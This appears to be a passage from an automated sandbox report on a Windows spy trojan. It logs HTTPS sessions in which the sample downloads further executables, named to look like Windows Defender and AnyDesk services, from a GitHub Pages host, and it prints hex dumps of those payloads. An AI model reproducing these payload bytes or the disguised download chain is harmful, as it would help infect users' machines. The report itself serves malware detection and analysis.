b6 17 6c 51 ab 49 d8 a4 61 fa ee 17 8a 38 4d 85 e4 75 12 4b 72 80 c7 00 16 b8 75 d5 4f 60 5c 2c eb 32 7e 45 a3 40
                                                                                                    Data Ascii: T(\-05^*IW#?/*pt<p+p*C~B&HTC{8JQkL$!){7{Z^~,BmFL&bl,Y!Mt`7xiw`iAu!Cqo+~I3_mA6;K^Xahx1 "JAlQIa8MuKruO`\,2~E@


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.649712185.199.110.1534432404C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:02 UTC89OUTGET /file/MicrosoftWindowsDefenderCoreService.exe HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:02 UTC737INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 143872
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-23200"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:02 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: E208:AB57C:286E703:2D3F5C1:66F89E9A
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:02 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740076-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569563.676575,VS0,VE17
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 0919a7b70d02b0c26ce00924ed598104205c5488
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fc e2 01 37 b8 83 6f 64 b8 83 6f 64 b8 83 6f 64 f3 fb 6c 65 bd 83 6f 64 f3 fb 6a 65 0e 83 6f 64 f3 fb 6b 65 a8 83 6f 64 a8 07 6c 65 b2 83 6f 64 a8 07 6b 65 a9 83 6f 64 a8 07 6a 65 ea 83 6f 64 f3 fb 6e 65 b1 83 6f 64 b8 83 6e 64 c3 83 6f 64 f0 06 66 65 b9 83 6f 64 f0 06 90 64 b9 83 6f 64 b8 83 f8 64 b9 83 6f 64 f0 06 6d 65 b9 83 6f 64 52 69 63 68 b8 83 6f 64 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7odododleodjeodkeodleodkeodjeodneodndodfeoddoddodmeodRichod
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: ff ff 7f 76 14 b8 57 00 07 80 f5 1c 33 d2 66 89 11 7a 9f 1d de ec 38 c3 3e 5a 58 4d 8b c8 2a 60 d4 03 4c 45 ed 14 7b 2d 9f d1 ea a5 68 60 1a b4 2c 5c ff 6c a3 18 38 78 6b 3f f1 49 8b d9 6a 7a aa 8b f1 33 ed df d6 ec 3c 28 ce cb d5 d6 04 8e 60 4a df ed 73 dd c9 01 a1 28 73 aa 01 9d ea c0 b9 ff 00 0f 48 fc bf 29 b6 c1 12 78 0e 94 e0 3b cf 77 06 8b c5 74 07 eb 09 b8 7a cd 9a 2d 18 2e 20 2c 7e 78 da 40 08 66 48 24 86 87 66 08 da 50 63 5f 79 b1 c0 72 ff 3a 02 8b c2 76 b5 63 fb 76 70 b4 0f 57 62 53 48 0b 0c 48 08 0f 11 02 de 8b c4 3e de 12 80 c3 cb 7d 44 d8 3f ad b0 51 52 c6 2d 19 ad 48 0f 45 c2 41 e2 da 7b 90 df 57 c7 4a 57 ba fa 6f d1 de cb 89 01 8b da 24 c1 8d 12 d8 f6 c3 01 74 0d ba 18 1f 06 0f 76 63 8b cf fc f5 9c 6b 1a c7 a6 b4 90 74 df 5f 8a 11 84 9b 87
                                                                                                    Data Ascii: vW3fz8>ZXM*`LE{-h`,\l8xk?Ijz3<(`Js(sH)x;wtz-. ,~x@fH$fPc_yr:vcvpWbSHH>}D?QR-HEA{WJWo$tvckt_
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 06 4e f0 89 37 65 84 cf bd 68 f0 20 0f 49 05 5e a7 ac bb 22 ff 1c c8 73 20 ff ef ef 81 3c 07 f2 df df cf 43 70 20 cf cf bf bf df a4 15 0e 6f 81 90 a3 4c 8d 9c 24 a7 20 5b 00 05 68 b6 28 06 73 30 e3 12 5f 57 7c e1 87 0a a2 1b 10 33 1f 0f 58 04 c5 8f b6 cc 51 10 70 72 ef 94 bf 68 1e a7 3f 20 56 87 66 f0 24 49 3b d0 74 d7 da 3f b5 25 28 7c 5a 8d 79 10 66 90 5e 0b 2a d7 80 39 7b eb 68 58 88 f2 ff a2 3b de 75 eb 22 3f 5e ed 1e 33 ab 48 b9 5e c3 cc bf f0 c8 21 98 ad 40 58 bf 6f 42 a4 aa c3 7f 18 04 c9 4c 2b c2 98 52 94 08 fd e3 bf 02 a9 5d 53 e0 50 48 43 fe 6a c5 81 1f 2f 5a d8 8b fa 91 d9 8b 41 20 f6 0f 0f 8a da 7e 38 49 18 eb eb 0b 79 09 19 af be f7 53 a7 4b 28 2b 68 da 59 2b 40 31 3d ba c0 f6 c7 6e 30 b3 cb f3 41 1a e0 80 b9 a5 1f bc ac ce f8 60 0f 29 da 5b
                                                                                                    Data Ascii: N7eh I^"s <Cp oL$ [h(s0_W|3XQprh? Vf$I;t?%(|Zyf^*9{hX;u"?^3H^!@XoBL+R]SPHCj/ZA ~8IySK(+hY+@1=n0A`)[
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: d0 eb 25 4c ee 8f 60 28 11 fc fa 25 d3 3c a0 f8 82 05 07 23 c7 45 10 0e 9e d7 25 fb 22 57 c0 50 d0 14 06 24 34 d6 8d e7 79 44 54 64 cc 74 04 33 b8 0f b6 7c 88 85 e0 05 bd f8 0c 0d 1f 83 8c 3c 2d 34 20 c0 d8 c0 83 8c 3c 23 28 80 98 80 31 6c 21 22 d2 5d 18 04 da 13 fe 68 50 4d 8e 26 f6 b9 47 0a 41 8f 7c 8e 6d 12 2e 0a 61 29 0a 34 0a 33 0a 26 1d 2a d8 91 0a 2b 0a 02 fe 4b 63 d3 f1 e2 fb f9 96 33 c1 49 ec 21 64 e4 90 91 74 dd 76 ce 46 0e 19 39 78 bf 7a b0 c7 90 91 43 7c a1 53 6d a3 ba b7 33 c0 10 80 33 bf f6 6e c8 06 61 ac ba 1f 9b c9 70 c9 85 62 2f 57 2d 3c c7 19 cc 15 1f e3 86 b7 31 84 7d 3e 3e 6b 2f 3b ff c7 78 72 e8 f6 80 6f 1c 03 17 69 a0 7b 26 a0 56 bc c9 0c 79 b8 1f a2 4d 08 21 b3 04 1b 62 04 46 20 72 ff 16 e3 db 2c 1c 8d 5c 21 dc c6 95 b8 5d fa 07 76
                                                                                                    Data Ascii: %L`(%<#E%"WP$4yDTdt3|<-4 <#(1l!"]hPM&GA|m.a)43&*+Kc3I!dtvF9xzC|Sm33napb/W-<1}>>k/;xroi{&VyM!bF r,\!]v
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 40 95 4a 50 48 40 f2 81 23 84 70 39 d8 0a 80 ab f3 2d 90 0e 28 03 21 40 28 16 ad 92 7c ff 01 a4 bb 62 60 d0 9a 54 24 9a 9d 0d 8b ce ca 2b ba 05 5e fc 39 11 f8 c7 27 18 ac fc 2a c8 70 f9 dc 66 6e 6b 62 63 00 86 f9 8d 5b b1 0f be c0 a1 60 dd 37 0e e3 a9 60 a5 10 6b c5 39 52 ff 24 7c 26 1c 71 c3 8a e1 9f 07 14 72 ee c6 45 85 00 d3 c1 49 2e 39 04 c3 39 36 18 34 2c 07 96 38 d3 60 81 43 1c 27 28 76 85 e8 01 76 e8 d5 fc 07 7c f8 d9 68 f0 6e fd a0 28 79 f8 67 67 69 77 0a 77 6a 79 70 05 38 14 fc 16 8c 70 7d 98 8e 1e f6 c5 04 0d 10 86 f7 55 e1 fc d9 c8 30 28 c0 1e e1 3f 6e 04 53 04 df 55 dd 12 08 5e 1c 0b c4 17 eb 87 76 31 ab 86 99 80 2b 7c d7 cf 3a 5c 09 77 c5 1a 38 e5 11 10 ec c8 5c 23 42 23 d5 32 2b 4c e3 db 45 11 cf 31 9d 8d f0 03 4d 53 79 50 bf 00 05 10 18 20
                                                                                                    Data Ascii: @JPH@#p9-(!@(|b`T$+^9'*pfnkbc[`7`k9R$|&qrEI.9964,8`C'(vv|hn(yggiwwjyp8p}U0(?nSU^v1+|:\w8\#B#2+LE1MSyP
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: c8 24 23 5f 12 4f 8c 4c 32 32 14 3f 16 2f c8 24 23 93 18 1f 1a 0e 39 32 c9 0f 1c ff e4 1e da 86 49 46 ef 20 3f 23 6d 98 b6 61 22 3f 23 24 3f 86 69 1b a6 23 26 3f 23 28 3f 98 b6 61 da 23 2a 3f 23 2c 69 1b a6 6d 3f 23 2e 3f 23 1e 03 3f 9d 30 3e ad 32 08 97 07 84 9f b5 03 67 b6 9c fb d0 0b da 8b 71 b8 c3 85 50 24 30 ff 73 ff 12 54 60 ff 79 7e 0b ff 6e 58 64 ff 5d ff 41 bb 06 6b a7 dd 05 e6 5b 0a 2a 5c 12 52 2a 7e af 9d 6f b8 58 1f 60 12 4f 5e 64 12 4a ff 66 db e7 f9 79 68 68 ff 45 6c 4e ff 2a 41 b9 fe 7b ed be 5a 5b 70 1e 12 2d 32 74 12 72 ff 70 ff bb 70 3c bf f7 fb 31 78 1c 1f ff 2b 30 7c 12 2a ff 24 80 cf f3 f3 fc 22 ff 14 84 3f ff 2f 88 39 76 5e 3b cf ff 3f 8c 4a 21 12 90 0e f1 f3 fc bc 7e 12 94 25 ff 2a 98 27 ff 54 02 17 03 3f 36 58 e3 1e 55 ff 00 21 dd
                                                                                                    Data Ascii: $#_OL22?/$#92IF ?#ma"?#$?i#&?#(?a#*?#,im?#.?#?0>2gqP$0sT`y~nXd]Ak[*\R*~oX`O^dJfyhhElN*A{Z[p-2trpp<1x+0|*$"?/9v^;?J!~%*'T?6XU!
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 0e 48 d3 d8 21 23 87 8c 0c 4a f0 4c e1 72 c8 c8 21 4e d2 50 87 8c 1c 32 c3 52 b4 54 c8 c8 21 23 a5 56 96 8c 1c 32 72 58 87 5a 78 c8 21 23 87 5c 69 5e 1c 32 72 c8 5a 60 4b 62 21 23 87 8c 3c 64 2d a9 74 c8 c8 66 1e 68 17 e4 90 91 63 21 6a 00 6c f9 ea 0c 72 f1 d7 6e cf 70 07 5c f5 ca 6a 8f b0 b0 6c cf 0d b5 bd 96 87 63 57 1c 12 43 57 af 9d 67 6f ce 12 4c 26 12 c8 22 10 12 cc d7 ee 3b 00 46 3b d0 12 22 17 12 cf fb 9e 9f d4 0c 57 13 d8 4f 22 12 dc 0d f7 3d 3f cf 57 1a e0 27 57 06 e4 63 08 12 cf f3 fb 9e e8 36 63 ec 12 07 57 02 f0 17 cf cf e5 7d 4f f4 12 30 f8 11 57 15 fc ec 08 1c 3c 0a 17 22 36 18 87 1c 08 42 c8 02 04 87 8c 0c fb a3 f3 d6 21 06 e4 08 c8 c8 21 23 d5 0a c6 8c 1c 32 72 0c b7 0e a8 c8 21 23 87 10 99 12 1c 32 72 c8 8a 14 7b 16 21 23 87 8c 6c 18 5d
                                                                                                    Data Ascii: H!#JLr!NP2RT!#V2rXZx!#\i^2rZ`Kb!#<d-tfhc!jlrnp\jlcWCWgoL&";F;"WO"=?W'Wc6cW}O0W<"6B!!#2r!#2r{!#l]
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 43 46 0e 9e bc a0 39 64 e4 90 ad a2 9e a4 43 46 0e 19 8f a6 80 64 e4 90 91 a8 71 aa 62 46 0e 19 39 ac 53 ae 44 e7 90 91 43 b0 35 b2 02 4f c0 5f a7 b4 06 45 1a 84 bb 3e 2d aa a7 30 33 6b 8d 06 61 40 76 6d 7f 44 12 41 7a 6f b4 0e 75 46 12 78 eb 08 3d d5 a2 0c 12 34 23 50 12 e3 99 0e d2 69 1a f6 12 7e c2 a3 f0 7a fb 58 63 0e 5c 8d af 37 16 12 5b 60 9f 33 3b d6 1b ef 46 12 6c 97 68 4f 6c 12 ef 7b 6f b4 86 67 46 12 33 3b 74 12 74 0a bf ef 7d c7 78 12 6b 27 7c 12 71 00 6a 6e 29 3c 58 b2 03 46 b2 12 f0 bd a5 d0 c2 7e b2 12 49 3b 8c fb de a3 70 53 c2 90 12 58 c7 94 12 85 6f 29 b4 36 71 b2 8b 4e 3c 4b e1 2d b2 77 b3 3b 0d f4 8c 10 2e 4c 12 77 5f a8 1a 1c 74 07 3f ef ac 17 8f b0 cf 04 08 0e 3f e2 a4 8b 11 70 50 48 d6 88 92 34 c6 47 c2 b8 0f f1 c8 33 05 91 49 66 43
                                                                                                    Data Ascii: CF9dCFdqbF9SDC5O_E>-03ka@vmDAzouFx=4#Pi~zXc\7[`3;FlhOl{ogF3;tt}xk'|qjn)<XF~I;pSXo)6qN<K-w;.Lw_t??pPH4G3IfC
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: 10 76 99 92 ca 94 12 69 14 bd 60 53 52 63 16 ef 18 02 ee 82 4d 10 5f 1a 5f 1c 2f df 05 9b 92 78 1e 5f 20 2e 33 d2 da 2d f0 62 29 22 02 6b 07 b9 03 5d 91 23 39 1b 24 33 ef b8 26 29 19 99 92 d7 28 bf 19 99 92 91 2a a7 2c 8f 99 92 91 29 2e 77 30 92 91 29 19 5f 32 47 91 29 19 99 34 2f 36 91 1c 99 92 17 38 ff b7 8c 4c c9 c8 3a e7 3c cf 4c c9 c8 94 3e b7 40 c9 c8 94 8c 9f 42 87 c8 94 8c 4c 44 6f 46 94 8c 4c c9 57 48 3f 8c 4c c9 c8 4a 27 4c 0f 8e e4 c8 94 4e f7 b6 50 64 64 4a 46 df 52 c7 64 4a 46 a6 54 af 56 4a 46 a6 64 97 58 7f 46 a6 64 64 5a 67 5c 4f a6 64 64 4a 5e 37 60 b6 69 4a 46 1f 62 7f 33 74 b4 9b a6 64 7f b5 33 66 b5 4d 53 db 7f 33 68 7f 33 4d 53 db 34 6a 7f 33 6c 7f 53 db 34 b5 33 6e 7f 33 70 db 34 b5 4d 7f 33 72 7f 33 34 b5 4d 53 74 7f 33 76 da 4d 53
                                                                                                    Data Ascii: vi`SRcM__/x_ .3-b)"k]#9$3&)(*,).w0)_2G)4/68L:<L>@BLDoFLWH?LJ'LNPddJFRdJFTVJFdXFddZg\OddJ^7`iJFb3td3fMS3h3MS4j3lS43n3p4M3r34MSt3vMS
                                                                                                    2024-09-29 00:26:02 UTC1378INData Raw: b2 77 0f 76 c9 97 c9 b2 73 ca df cb b2 83 5d f2 b5 53 1b cc b2 79 cd 6f c9 97 7c ed ce b2 74 1b cf b2 65 d0 b2 6d 76 c9 97 7c d1 b2 33 d2 b2 32 d3 fb 38 d8 b5 0f d4 b2 63 1b d5 8b d6 83 5d fb 20 bf d7 b2 2e 1b d8 fb b5 0f 76 ed d9 b2 78 1b da 37 db b2 20 1b b0 83 5d f2 dc b2 2f dd fb de 53 b8 f6 41 70 df db e0 b2 61 1b e1 81 5c fb 60 2f e2 b2 6b 1b e3 e4 da 07 c5 e4 7f e5 b2 6c 1b e6 07 c1 c1 0e e7 fb e8 4f e9 81 1c ec da b2 66 1b ea 53 eb 20 07 bb f6 ec b2 54 1b ed 53 ee 07 c3 41 70 ef 33 f0 f3 f1 10 5d fb 60 6f f2 b2 41 1b f3 07 b8 f6 c1 71 f4 5f f5 b2 44 1b f6 86 83 e1 a0 0f f7 67 f8 4b 5c f2 b5 0f f9 b2 55 1b fa b2 70 fb c5 41 71 70 0b fc 0f fd 47 83 e8 60 07 fe df ff af 92 af 7d b0 00 37 01 b2 72 1b 02 b2 76 0e 8e 83 e1 03 2f 04 43 05 60 07 d1 c1 8b
                                                                                                    Data Ascii: wvs]Syo|temv|328c] .vx7 ]/SApa\`/klOfS TSAp3]`oAq_DgK\UpAqpG`}7rv/C`


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.649714185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:09 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:09 UTC753INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:09 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740046-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569570.538904,VS0,VE12
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 6b776334eaaa2a021264795acfaec39ed588632a
                                                                                                    2024-09-29 00:26:09 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.649715185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:10 UTC74OUTGET /file/AnyDeskUpdateService.exe HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:10 UTC758INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 161792
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-27800"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:10 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: AAC3:C0BC3:2A99413:2F6A54C:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:10 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740073-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569570.140885,VS0,VE18
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 68be8d24789bf086768f140fab71435d11973ddc
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 83 5c ce c7 c7 3d a0 94 c7 3d a0 94 c7 3d a0 94 8c 45 a3 95 c2 3d a0 94 8c 45 a5 95 7f 3d a0 94 8c 45 a4 95 d7 3d a0 94 d7 b9 a3 95 cd 3d a0 94 d7 b9 a4 95 d6 3d a0 94 d7 b9 a5 95 96 3d a0 94 8c 45 a1 95 ce 3d a0 94 c7 3d a1 94 43 3d a0 94 8f b8 a9 95 c6 3d a0 94 8f b8 5f 94 c6 3d a0 94 c7 3d 37 94 c6 3d a0 94 8f b8 a2 95 c6 3d a0 94 52 69 63 68 c7 3d a0 94 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$\===E=E=E====E==C==_==7==Rich=
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 98 0e 6d 51 2c 5c bf 6c d6 1a 1e 3a 63 18 b1 02 d9 6a 7a aa f8 50 70 f0 8b f1 33 ed ff ee cb 95 d6 b9 6e 6b 36 e2 04 8e 60 4a c9 01 a1 28 73 13 6d 69 f8 aa 02 21 50 09 12 78 0e 14 e0 5b 30 f8 7f 3b cf 77 06 8b c5 74 07 eb 09 b8 7a 2e 20 2c 7e 78 17 cd 9a 35 da 40 08 66 48 08 da 50 23 10 0c 4e 14 1f 40 53 02 b6 47 3b 7a 3c 02 8b c2 6f f5 36 0f 57 22 53 da 8b 6f 07 48 0b 0c 48 08 0f 11 02 d6 83 98 3e c3 61 4f 09 f9 7c 20 5b 7e 51 52 90 d8 3b dd 86 2d b2 04 2d 48 0f 45 c2 41 3f 46 db 7b df 57 c7 4a d7 f4 12 8a 89 01 c5 ff 8b 17 d6 83 c1 9a 01 84 28 f6 c3 01 74 0d ba 18 c5 ba 0f 83 ef cf 22 67 0c 6b da c7 df 5f 3a 53 5a 48 8a 91 84 81 e9 c7 cd 43 53 3f b9 b1 04 c7 41 10 6b 8b 9d 6d f0 89 41 3d 46 f5 65 8b c1 9d d9 8b 0d 4e 5f 36 8d 4c 55 04 f2 43 c3 b7 57 26
                                                                                                    Data Ascii: mQ,\l:cjzPp3nk6`J(smi!Px[0;wtz. ,~x5@fHP#N@SG;z<o6W"SoHH>aO| [~QR;--HEA?F{WJ(t"gk_:SZHCS?AkmA=FeN_6LUCW&
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 1e ff a7 bc f8 b0 e8 ec 44 ba d2 41 ec d9 c3 80 cf 35 6e bf 68 cb 2e 37 6c 3f c0 6c 5b 96 e6 44 4c 8b 9a 85 c0 74 09 de b8 00 f6 8b 08 ba bf df 78 3b c0 66 70 c4 5e ff 25 75 e6 07 c7 48 0c dd c3 b8 35 c3 3f 15 c6 6b 8e f0 55 57 41 56 a4 b9 b0 7f f7 7f e0 be 1e 45 33 f6 d4 92 0e 9d 4c 39 31 0f 85 11 05 3e 90 62 b9 30 d9 d0 f0 e8 76 b3 0d 41 67 ef 0f 10 59 28 db 75 0d 92 40 a1 f8 ea 59 30 eb ec 1d 98 a8 26 de f3 fe 53 34 36 b7 e7 4c 89 75 bf c6 45 c7 00 0e cf 53 79 ed 4a d7 df 66 44 08 e7 10 ef f7 7c b7 55 da ff 32 07 0f 0e 17 00 9e ff ba 53 5b 64 6f b6 8f f8 52 76 13 5c df 29 b0 7c fd 1b 4d 1f 2e 5e 24 0a 3e 9e 01 bf c8 48 10 66 06 4e a2 37 2e 15 2f c2 65 f0 4d 0f 39 bb 40 9e 03 79 22 ff ff ef e4 39 90 e7 ef df df cf 82 03 79 0e cf bf bf df 70 78 27 1c d0
                                                                                                    Data Ascii: DA5nh.7l?l[DLtx;fp^%uH5?kUWAVE3L91>b0vAgY(u@Y0&S46LuESyJfD|U2S[doRv\)|M.^$>HfN7./eM9@y"9ypx'
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 58 24 79 78 90 06 7d c4 1e 01 78 60 6d 3b df ef 78 bb 6a 1c 41 bb 60 29 c8 1e 57 78 12 cc f3 fc 3c 3f 51 78 24 d0 2e 78 35 d4 3f cf cf f3 30 78 18 d8 16 78 3f dc 34 78 3c ed be ff 3c e0 2c 78 27 78 bf 78 95 e4 1c 12 7e bf f7 f3 6d de be 7e 1f e8 11 78 19 50 ec 12 26 78 3e ee 79 ed 3c f0 b0 3d 12 f4 24 78 e7 e7 b5 d3 12 f8 70 26 12 fc 33 78 39 6b f7 7d cd 00 06 2d dc ba 75 95 04 1c 12 28 30 b8 8a f7 df 08 12 25 78 2a 78 b8 5f 30 66 5a 0c 1e cf 7b c3 05 0a 05 af 8f 50 66 41 33 c3 22 0e b9 52 79 2b df 61 78 2d 9a 33 c1 2a 10 62 19 a9 1c 32 86 12 63 72 87 8c 54 0e 14 64 5e 16 95 43 46 2a 65 4a 18 66 91 ca 21 23 36 1a 67 c8 48 e5 90 22 1c 68 0e 0c 72 a4 72 1e 69 fa 8e 20 48 f7 7c 13 af eb 21 c3 22 4d 6b c8 48 77 c8 d7 24 2b 6c c3 39 64 a4 72 26 6d af 28 a9 1c
                                                                                                    Data Ascii: X$yx}x`m;xjA`)Wx<?Qx$.x5?0xx?4x<<,x'xx~m~xP&x>y<=$xp&3x9k}-u(0%x*x_0fZ{PfA3"Ry+ax-3*b2crTd^CF*eJf!#6gH"hrri H|!"MkHw$+l9dr&m(
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 23 87 ca f8 84 69 dd 20 47 ba cc db 6a df 84 ce 2b 6b 95 d9 21 23 cb d0 83 bc 6c 21 23 dd 21 d2 57 6d a3 ec 90 ca c8 d4 94 6e d6 2b 91 ee 90 ca 80 6f d8 83 70 90 91 ee 90 67 da 2b 71 53 ee 90 ca ec dc 83 44 72 de 57 91 ee 90 91 73 2b e0 2b 74 c2 57 e7 90 17 e2 39 e4 0a 0e 79 b9 3c f9 09 6c 58 0b 20 fc 1c 78 25 8c 13 0e 5e 0e a0 12 7d 0e 76 7d cf f3 f3 28 64 0e 78 2c 6b 27 30 b5 bb c0 ff 12 7c 0e 6f 0e 41 bf 4b 0e 8a 34 1e 12 74 ed 2e db ef 32 38 12 70 0e 7b 32 bc 4f 3c 1e 12 56 b6 1f ba 6c 1e bd 51 40 5e 0e 67 1e b8 41 b9 6c ed 5c 44 12 43 1e b9 43 48 76 be df db 12 49 0e bb 4c 1c 41 bb 49 29 4c 1e bd ef f9 bd 4c bc 50 12 58 0e 68 54 51 5f 12 58 7d ef bb e0 f9 1c 41 be 55 5b 5c 1e 55 a4 ba 44 76 be b7 f3 1d 60 12 5a 0e bf 57 1d 64 12 bf 07 6e f7 50 0e b8
                                                                                                    Data Ascii: #i Gj+k!#l!#!Wmn+opg+qSDrWs++tW9y<lX x%^}v}(dx,k'0|oAK4t.28p{2O<VlQ@^gAl\DCCHvILAI)LLPXhTQ_X}AU[\UDv`ZWdnP
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 18 38 a4 ca 21 23 95 1a 39 90 1c 37 e0 90 91 3a 7c 1e 55 20 a0 01 07 2c 1e 36 d0 ed 34 60 06 c1 18 55 00 08 16 f6 cf f3 73 eb 15 b5 15 9a 12 cd 15 a4 08 ae fc 3c 3f cf 15 93 0c 95 15 98 10 92 15 89 fc dc fa f3 14 8c 15 5c 16 8e 12 52 16 7b fe cf f3 f3 1c 70 16 70 20 60 16 6b 16 41 bb 34 16 f9 de ae 01 53 24 1e 12 3a 16 bf 3a 1d 28 fb b6 df fb 55 16 4b 50 2c 12 65 16 75 50 bd 49 33 30 1e f7 7b 4e dc 49 70 64 12 7c ac 41 be 42 33 79 7e af dd 38 1e 12 7a 32 3c 12 76 16 78 40 7d cf e5 f9 79 16 5f 44 6c 48 6f 7d 78 2e 97 e7 12 4c 69 50 77 54 7e ef b2 3d 45 4e aa bf 4e 58 1e 7e 32 41 bc 53 be df db f9 1f 5c 12 40 16 ba 40 1c 41 ba 44 29 60 df 1f bc 76 12 52 7c 64 09 06 16 bb 4d 31 68 f3 ed b6 76 1c 12 46 7a b8 46 5d b9 47 2b 6c e8 15 8a b6 12 2c 16 5e 16 2b 75
                                                                                                    Data Ascii: 8!#97:|U ,64`Us<?\R{pp `kA4S$::(UKP,euPI30{NIpd|AB3y~8z2<vx@}y_DlHo}x.LiPwT~=ENNX~2AS\@@AD)`vR|dM1hvFzF]G+l,^+u
